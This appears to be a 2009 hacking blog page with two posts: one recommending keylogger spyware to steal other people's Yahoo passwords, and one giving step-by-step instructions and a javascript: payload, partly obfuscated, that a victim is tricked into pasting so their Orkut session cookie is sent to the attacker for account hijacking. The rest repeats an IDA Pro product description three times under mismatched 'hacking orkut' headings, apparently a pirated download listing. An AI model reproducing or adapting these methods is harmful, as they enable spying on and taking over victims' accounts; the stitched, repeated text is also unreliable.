Wednesday, September 2, 2009

EASIEST WAY TO HACK YAHOO PASSWORD

Using keylogger is the easiest way to hack a Yahoo password. Any one with a basic knowledge of computer can use a keylogger without any problems. It doesn’t matter whether or not you’ve physical access to the target computer. The following are some of the frequently asked questions about keyloggers.
1. What is a keylogger?
A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as Spy program or Spy software.
2. Where can I get the keylogger?
There exists hundrends of keyloggers on the internet. But most of them are of poor quality and fail to deliver a good performance. The two best keyloggers for hacking yahoo password are listed below.
SniperSpy (Supports Remote Installation)
Win-Spy (Supports Remote Installation)
For more information on keyloggers, installation procedure and FAQs please refer my previous post: How to Hack an Email Account
3. Which keylogger is the best to hack Yahoo password?
Both the above mentioned ones are best for hacking Yahoo. However I recommend SniperSpy since it is more reliable and has got a better advantage over WinSpy. To get a complete review of SniperSpy please see my new post Which Spy Software to Choose
If you’re really serious to hack a Yahoo password then I strongly recommend using either of the two mentioned keyloggers.
For a complete installation guide and more information on these two softwares visit the following links
1. SniperSpy 2. WinSpy

orkur hacking by cookie stealing

1. Get Firefox and then Cookie editor firefox addon.2. Here, you should have 2 Orkut accounts (Yep !). One for sending cookie script to victim and other to receive victim's orkut cookies.3. Javascript to be sent to victim for hacking orkut account password :javascript:nobody=replyForm;nobody.toUserId.value=33444211;nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?Action.submit';nobody.submit()4. Now, replace the value in blue with your orkut album value. Right click on your photo and selecting Properties, you will get a 8-digit number (not available now due to recent fix by orkut.com) like say 55886645.jpg. Just replace "33444211"with "55886645" in above script.5. The final script which you'll send to victim will look like :javascript:nobody=replyForm;nobody.toUserId.value=yournumber;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()6. Send this cookie script to one whose, you wanna hack orkut account and ask him to paste it in his address bar and hit enter.7. You'll get his orkut account cookie in scrapbook. Now, go to your orkut homepage. Click Tools ->Cookie editor plugin. Now, click on Filter/ Refresh and look for "orkut_state". Double click it and replace this with victim script and put your eight digit number in place of "33444211".8. Simply logout of your orkut account and login again. You'll be on victim homepage and hence, hacking orkut account...your aim of hacking orkut account completed.So guys, this was the orkut hack used forhacking orkut accountby cookie stealing. This hack for hacking orkut account is reported to be fixed by orkut.com and hence no more working. Efforts are being taken to develop new ways of hacking orkut account. I will inform you about newly developed orkut hacks as they are out.

Hacking orkut account password:

Windows XP / Vista (32 or 64) Rar 53,2 MbThe Interactive Disassembler, more commonly known as simply IDA, is a commercial disassembler widely used for . It supports a variety of executable formats for different processors and operating systems. It also can be used as a debugger for Windows PE executables. In other words, if you are or want to be a cracker or a keygen programmer this is the tool you need.IDA Pro is a disassembler.As a disassembler, IDA Pro explores binary programs, for which source code isn't always available, to create maps of their execution. The real interest of a disassembler is that it shows the instructions that are actually executed by the processor in a symbolic representation called assembly language. If the friendly screen saver you have just installed is spying on your e-banking session or logging your e-mails, a disassembler can reveal it. However, assembly language is hard to make sense of. That's why advanced techniques have been implemented into IDA Pro to make that code more readable, in some cases, quite close to the original source code that produced the binary program. The map of the program's code then be postprocessed for further investigations. Some people have used it as the root of a genomic classification of viruses. (digital genome mapping ' advanced malware analysis)IDA Pro is a debugger.But, in real life, things aren't always simple. Hostile code usually does not cooperate with the analyst. Viruses, worms and trojans are often armoured and obfuscated. More powerful tools are required.The debugger in IDA Pro complements the static analysis capabilities of the disassembler: by allowing to single step through the code being investigated, the debugger often bypasses the obfuscation and helps obtain data that the more powerful static disassembler will be able to process in depth. IDA Pro can be used as a local and as a remote debugger on the 80x86 (typically Windows/Linux) and the ARM plaform (typically Windows CE PDAs). Remote debuggers are very useful when one wants to safely dissect potentially harmful programs.IDA Pro is interactive.Because no computer can currently beat the human brain when it comes to exploring the unknown, IDA Pro is fully interactive. In sharp contrast with its predecessors, IDA always allows the human analyst to override its decisions or to provide hints. Interactivity culminates in a built-in programming language and an open plugin architecture.IDA Pro is programmableIDA Pro contains a complete development environment that consists of a very powerful macro-like language that can be used to automate simple to medium complexity tasks. For more advanced tasks, our open plugin architecture puts no limits on what external developers can do to enhance IDA Pro's functionality. One could, for example, extend IDA Pro with a MP3 player and make malware sing. However, we suspect our governmental customers are involved in more serious projects.How is IDA Pro useful?Hostile Code analysisGiven the speed and the complexity of today's hostile code, a powerful analysis solution is required. IDA Pro has become such a standard in the field of malware analysis that information about new viruses is often exchanged under the form of IDA Databases. The 2001 CODE RED incident is typical of what usually happens in the background. When eEye isolated a new worm whose payload targeted the White House's web site, IDA Pro was used to analyze and understand it: it helped the talented eEye analysts deliver a prompt and accurate warning of the impending attack. 24 hours a day, seven days a week, somewhere in the world, thanks to IDA Pro, anti-virus analysts investigate new virus samples and provide timely solutions.Vulnerability researchIDA Pro is the ideal tool to investigate why software breaks. While the topic of vulnerability disclosure remains, more than ever, controversial, one cannot ignore the fact that software is unfortunately often vulnerable to outside attacks. It is, without any doubt, a bad idea to let vulnerabilities lurk in essential pieces of software: if they aren't fixed, they could very well be exploited by what we usually call the bad guys. The Wisconsin Safety Analyzer is a very interesting project investigating software vulnerability and tamper resistance where IDA Pro plays an important role.COTS validationA lot of software is now developed outside the country where it is used. Since programs are incredibly hard to verify, since complete source code audit and rebuilds aren't always practical tools such as IDA provide a convenient means to check if a program really does what it claims to do.Privacy protection.Software is invading our lives at every level. In some cases, such as in what is known as the Sony Rootkit story, IDA Pro helps protect your essential rights.Other usesIDA Pro has generated quite a lot of interest in academic circles.Who are IDA Pro users?Virtually all anti-virus companies, most vulnerability research companies, many of the large software development companies and, above everything else, three letter agencies and military organizations.

Hacking orkut account password:

Windows XP / Vista (32 or 64) Rar 53,2 MbThe Interactive Disassembler, more commonly known as simply IDA, is a commercial disassembler widely used for . It supports a variety of executable formats for different processors and operating systems. It also can be used as a debugger for Windows PE executables. In other words, if you are or want to be a cracker or a keygen programmer this is the tool you need.IDA Pro is a disassembler.As a disassembler, IDA Pro explores binary programs, for which source code isn't always available, to create maps of their execution. The real interest of a disassembler is that it shows the instructions that are actually executed by the processor in a symbolic representation called assembly language. If the friendly screen saver you have just installed is spying on your e-banking session or logging your e-mails, a disassembler can reveal it. However, assembly language is hard to make sense of. That's why advanced techniques have been implemented into IDA Pro to make that code more readable, in some cases, quite close to the original source code that produced the binary program. The map of the program's code then be postprocessed for further investigations. Some people have used it as the root of a genomic classification of viruses. (digital genome mapping ' advanced malware analysis)IDA Pro is a debugger.But, in real life, things aren't always simple. Hostile code usually does not cooperate with the analyst. Viruses, worms and trojans are often armoured and obfuscated. More powerful tools are required.The debugger in IDA Pro complements the static analysis capabilities of the disassembler: by allowing to single step through the code being investigated, the debugger often bypasses the obfuscation and helps obtain data that the more powerful static disassembler will be able to process in depth. IDA Pro can be used as a local and as a remote debugger on the 80x86 (typically Windows/Linux) and the ARM plaform (typically Windows CE PDAs). Remote debuggers are very useful when one wants to safely dissect potentially harmful programs.IDA Pro is interactive.Because no computer can currently beat the human brain when it comes to exploring the unknown, IDA Pro is fully interactive. In sharp contrast with its predecessors, IDA always allows the human analyst to override its decisions or to provide hints. Interactivity culminates in a built-in programming language and an open plugin architecture.IDA Pro is programmableIDA Pro contains a complete development environment that consists of a very powerful macro-like language that can be used to automate simple to medium complexity tasks. For more advanced tasks, our open plugin architecture puts no limits on what external developers can do to enhance IDA Pro's functionality. One could, for example, extend IDA Pro with a MP3 player and make malware sing. However, we suspect our governmental customers are involved in more serious projects.How is IDA Pro useful?Hostile Code analysisGiven the speed and the complexity of today's hostile code, a powerful analysis solution is required. IDA Pro has become such a standard in the field of malware analysis that information about new viruses is often exchanged under the form of IDA Databases. The 2001 CODE RED incident is typical of what usually happens in the background. When eEye isolated a new worm whose payload targeted the White House's web site, IDA Pro was used to analyze and understand it: it helped the talented eEye analysts deliver a prompt and accurate warning of the impending attack. 24 hours a day, seven days a week, somewhere in the world, thanks to IDA Pro, anti-virus analysts investigate new virus samples and provide timely solutions.Vulnerability researchIDA Pro is the ideal tool to investigate why software breaks. While the topic of vulnerability disclosure remains, more than ever, controversial, one cannot ignore the fact that software is unfortunately often vulnerable to outside attacks. It is, without any doubt, a bad idea to let vulnerabilities lurk in essential pieces of software: if they aren't fixed, they could very well be exploited by what we usually call the bad guys. The Wisconsin Safety Analyzer is a very interesting project investigating software vulnerability and tamper resistance where IDA Pro plays an important role.COTS validationA lot of software is now developed outside the country where it is used. Since programs are incredibly hard to verify, since complete source code audit and rebuilds aren't always practical tools such as IDA provide a convenient means to check if a program really does what it claims to do.Privacy protection.Software is invading our lives at every level. In some cases, such as in what is known as the Sony Rootkit story, IDA Pro helps protect your essential rights.Other usesIDA Pro has generated quite a lot of interest in academic circles.Who are IDA Pro users?Virtually all anti-virus companies, most vulnerability research companies, many of the large software development companies and, above everything else, three letter agencies and military organizations.

IDA

Windows XP / Vista (32 or 64) Rar 53,2 MbThe Interactive Disassembler, more commonly known as simply IDA, is a commercial disassembler widely used for . It supports a variety of executable formats for different processors and operating systems. It also can be used as a debugger for Windows PE executables. In other words, if you are or want to be a cracker or a keygen programmer this is the tool you need.IDA Pro is a disassembler.As a disassembler, IDA Pro explores binary programs, for which source code isn't always available, to create maps of their execution. The real interest of a disassembler is that it shows the instructions that are actually executed by the processor in a symbolic representation called assembly language. If the friendly screen saver you have just installed is spying on your e-banking session or logging your e-mails, a disassembler can reveal it. However, assembly language is hard to make sense of. That's why advanced techniques have been implemented into IDA Pro to make that code more readable, in some cases, quite close to the original source code that produced the binary program. The map of the program's code then be postprocessed for further investigations. Some people have used it as the root of a genomic classification of viruses. (digital genome mapping ' advanced malware analysis)IDA Pro is a debugger.But, in real life, things aren't always simple. Hostile code usually does not cooperate with the analyst. Viruses, worms and trojans are often armoured and obfuscated. More powerful tools are required.The debugger in IDA Pro complements the static analysis capabilities of the disassembler: by allowing to single step through the code being investigated, the debugger often bypasses the obfuscation and helps obtain data that the more powerful static disassembler will be able to process in depth. IDA Pro can be used as a local and as a remote debugger on the 80x86 (typically Windows/Linux) and the ARM plaform (typically Windows CE PDAs). Remote debuggers are very useful when one wants to safely dissect potentially harmful programs.IDA Pro is interactive.Because no computer can currently beat the human brain when it comes to exploring the unknown, IDA Pro is fully interactive. In sharp contrast with its predecessors, IDA always allows the human analyst to override its decisions or to provide hints. Interactivity culminates in a built-in programming language and an open plugin architecture.IDA Pro is programmableIDA Pro contains a complete development environment that consists of a very powerful macro-like language that can be used to automate simple to medium complexity tasks. For more advanced tasks, our open plugin architecture puts no limits on what external developers can do to enhance IDA Pro's functionality. One could, for example, extend IDA Pro with a MP3 player and make malware sing. However, we suspect our governmental customers are involved in more serious projects.How is IDA Pro useful?Hostile Code analysisGiven the speed and the complexity of today's hostile code, a powerful analysis solution is required. IDA Pro has become such a standard in the field of malware analysis that information about new viruses is often exchanged under the form of IDA Databases. The 2001 CODE RED incident is typical of what usually happens in the background. When eEye isolated a new worm whose payload targeted the White House's web site, IDA Pro was used to analyze and understand it: it helped the talented eEye analysts deliver a prompt and accurate warning of the impending attack. 24 hours a day, seven days a week, somewhere in the world, thanks to IDA Pro, anti-virus analysts investigate new virus samples and provide timely solutions.Vulnerability researchIDA Pro is the ideal tool to investigate why software breaks. While the topic of vulnerability disclosure remains, more than ever, controversial, one cannot ignore the fact that software is unfortunately often vulnerable to outside attacks. It is, without any doubt, a bad idea to let vulnerabilities lurk in essential pieces of software: if they aren't fixed, they could very well be exploited by what we usually call the bad guys. The Wisconsin Safety Analyzer is a very interesting project investigating software vulnerability and tamper resistance where IDA Pro plays an important role.COTS validationA lot of software is now developed outside the country where it is used. Since programs are incredibly hard to verify, since complete source code audit and rebuilds aren't always practical tools such as IDA provide a convenient means to check if a program really does what it claims to do.Privacy protection.Software is invading our lives at every level. In some cases, such as in what is known as the Sony Rootkit story, IDA Pro helps protect your essential rights.Other usesIDA Pro has generated quite a lot of interest in academic circles.Who are IDA Pro users?Virtually all anti-virus companies, most vulnerability research companies, many of the large software development companies and, above everything else, three letter agencies and military organizations.